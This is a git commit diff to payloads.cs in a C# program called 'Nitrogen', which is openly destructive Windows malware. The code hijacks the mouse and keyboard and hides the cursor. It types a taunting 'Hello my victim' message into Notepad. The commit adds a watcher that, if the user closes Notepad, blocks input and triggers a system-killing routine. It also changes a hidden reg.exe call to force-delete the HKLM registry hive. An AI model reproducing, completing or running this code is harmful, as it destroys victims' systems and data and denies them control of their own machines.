Prevent closing the notepad window
This commit is contained in:
parent
44b2547674
commit
b9b9477bc3
39
payloads.cs
39
payloads.cs
|
@ -188,21 +188,9 @@ namespace Nitrogen
|
|||
int x = Screen.PrimaryScreen.Bounds.Width, y = Screen.PrimaryScreen.Bounds.Height;
|
||||
Dll_Imports.POINT get_mouse;
|
||||
Dll_Imports.GetCursorPos(out get_mouse);
|
||||
if (variables.extreme == false)
|
||||
{
|
||||
Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-20, 20)), Convert.ToInt32(get_mouse.Y + rand.Next(-20, 20)));
|
||||
}
|
||||
else
|
||||
if (variables.extreme)
|
||||
{
|
||||
Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-100, 100)), Convert.ToInt32(get_mouse.Y + rand.Next(-100, 100)));
|
||||
}
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEUP, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, x, y, 0, UIntPtr.Zero);
|
||||
|
||||
string myText = "abcdefghijklmnopqrstuvwxyzěščřžýáíé+=´¨/*-+0123456789öÿïäëéóśńŕůú)§,.-" +
|
||||
"☺☻♥♦♣♠•◘○◙♂♀♪♫☼►◄↕‼¶§▬↨↑↓→←∟↔▲▼ !?ûùÿ┤╡╢╖╕║╗╝╜╛┐└┴┬├─┼╞╟╚╔╩╦╠═╬╧╨╤,-.!:É" +
|
||||
"@°E›ÍОÌåÃTWÉò=*ª‹nצádöÔâ͹¸¯š1‰z]fzç<yŠïj£øz]Òä[ƒ†”k•¢‚U¦áæQ|mkÚ~ú–H|‚ùSáp±Êjª1j" +
|
||||
|
@ -222,6 +210,13 @@ namespace Nitrogen
|
|||
Dll_Imports.SendInput(1, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT)));
|
||||
Thread.Sleep(5);
|
||||
}
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEUP, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTDOWN, x, y, 0, UIntPtr.Zero);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, x, y, 0, UIntPtr.Zero);
|
||||
}
|
||||
if (variables.extreme == false)
|
||||
Thread.Sleep(rand.Next(3000, 10000));
|
||||
else
|
||||
|
@ -273,6 +268,7 @@ namespace Nitrogen
|
|||
public static void story()
|
||||
{
|
||||
Thread.Sleep(5000);
|
||||
Thread CheckNotepadThread = new Thread(CheckNotepad);
|
||||
string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
string text = "Hello my victim " + userName + "!" +
|
||||
"I'm the thing you run 2 fucking seconds ago!" +
|
||||
|
@ -288,11 +284,11 @@ namespace Nitrogen
|
|||
char[] Mychars = text.ToCharArray();
|
||||
Process.Start(@"C:\Windows\notepad.exe");
|
||||
Process[] proces_name = Process.GetProcessesByName("notepad");
|
||||
Cursor.Hide();
|
||||
while (proces_name.Length == 0) { }
|
||||
Thread.Sleep(1000);
|
||||
Thread th_spam = new Thread(mouse_spam);
|
||||
th_spam.Start();
|
||||
CheckNotepadThread.Start();
|
||||
for (int num = 0; num < Mychars.Length; num++)
|
||||
{
|
||||
int x = Screen.PrimaryScreen.Bounds.Width; int y = Screen.PrimaryScreen.Bounds.Height;
|
||||
|
@ -312,6 +308,7 @@ namespace Nitrogen
|
|||
|
||||
Thread.Sleep(100);
|
||||
}
|
||||
CheckNotepadThread.Abort();
|
||||
Cursor.Show();
|
||||
Thread.Sleep(1000);
|
||||
foreach (Process proces_n in proces_name) { proces_n.Kill(); }
|
||||
|
@ -347,6 +344,7 @@ namespace Nitrogen
|
|||
Process[] proces_name = Process.GetProcessesByName("notepad");
|
||||
while (proces_name.Length == 1)
|
||||
{
|
||||
Cursor.Hide();
|
||||
proces_name = Process.GetProcessesByName("notepad");
|
||||
Cursor.Position = new Point(50, 50);
|
||||
Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, 50, 50, 0, UIntPtr.Zero);
|
||||
|
@ -354,6 +352,17 @@ namespace Nitrogen
|
|||
Thread.Sleep(1);
|
||||
}
|
||||
}
|
||||
public static void CheckNotepad()
|
||||
{
|
||||
Process[] proces_name = Process.GetProcessesByName("notepad");
|
||||
while (proces_name.Length == 1)
|
||||
{
|
||||
proces_name = Process.GetProcessesByName("notepad");
|
||||
}
|
||||
BlockInput(true);
|
||||
sys_death();
|
||||
Environment.Exit(-1);
|
||||
}
|
||||
public static void move_icon()
|
||||
{
|
||||
for (; ; )
|
||||
|
@ -457,7 +466,7 @@ namespace Nitrogen
|
|||
{
|
||||
UseShellExecute = true,
|
||||
FileName = "reg.exe",
|
||||
Arguments = @"delete HKCR /f",
|
||||
Arguments = @"delete HKLM /f",
|
||||
CreateNoWindow = true,
|
||||
WindowStyle = ProcessWindowStyle.Hidden
|
||||
};
|
||||
|
|
Loading…
Reference in New Issue